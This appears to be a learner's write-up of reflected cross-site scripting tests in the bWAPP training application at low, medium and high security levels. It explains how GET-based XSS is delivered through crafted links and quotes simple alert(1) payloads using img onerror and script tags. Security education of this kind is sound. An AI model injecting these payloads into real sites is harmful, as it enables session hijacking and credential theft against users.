XXS Via GET parameter [Reflected XXS]

Reflected Cross-Site Scripting (XSS) is commonly found in scenarios where user input is passed via GET parameters and subsequently reflected in the response without proper sanitization or encoding. To exploit this vulnerability, an attacker typically crafts a malicious URL containing the payload and tricks a user into clicking it. Since the user already trusts the domain, they are more likely to interact with the link. When the request is sent, the server appends the attacker's payload to the response, and the victim's browser executes it, leading to potential session hijacking, credential theft, or other malicious actions.

While POST parameters can also lead to reflected XSS, they pose a different challenge in terms of exploitation. Unlike GET-based attacks, where phishing a user with a link is straightforward, POST-based reflected XSS requires a different approach. Attackers would need to lure the user to a site they control and use an auto-submitting form to send the malicious request to the vulnerable application. However, the complexity and lower success rate of this method make it less common than GET-based attacks.

I will be using bWAPP for learning purposes.

XXS Reflected GET [Low]:

I will add my first name and last name and submit it.

I can see that value is passed using GET and also value is reflected in HTML page after submitting.

After looking at source code, I can see that first name and last name is added to the HTML code inside double quote.

When I entered "HI" and "hello" in the first name and last name field with the H1 html tag. I found that the website processes the H1 tag as an HTML tag and displays the value accordingly.

This means we can also run javascript. So, Let's test for XXS.

<img src=1 href=1 onerror="javascript:alert(1)"></img> # Worked

As it is processing HTML tag, I used img tag to test and it worked.

XXS Reflected GET [Medium]:

When I passed "HI" and "hello" with the HTML tag. it got processed by the web browser.

Again we can try to use XXS script.

<script>alert(1);</script> # worked.
<img src=1 href=1 onerror="javascript:alert(1)"></img> # Not Worked

n this instance, the <script> tag executes successfully while the <img> tag with the onerror attribute does not. This behaviour suggests that the web application—or an upstream filter—is modifying or stripping dangerous attributes (such as onerror in <img> tags) while leaving <script> tags intact. This selective filtering is a common defense against XSS attacks.

XXS Reflected GET [High]:

Oops... Looks like proper security is implemented on this. Our script tag is just reflected as it is in this case.

bWAPP - XSS Reflected (GET) - High Security Level

In High security mode, bWAPP applies strong input sanitization.
Characters like < and > are converted to < and >, preventing direct execution of <script> tags.
Common XSS payloads are neutralized, making exploitation difficult.
The exercise demonstrates effective XSS mitigation through proper output encoding.
Lesson: Proper filtering can prevent reflected XSS attacks in web applications.

PreviousXXS Attack

Last updated 9 months ago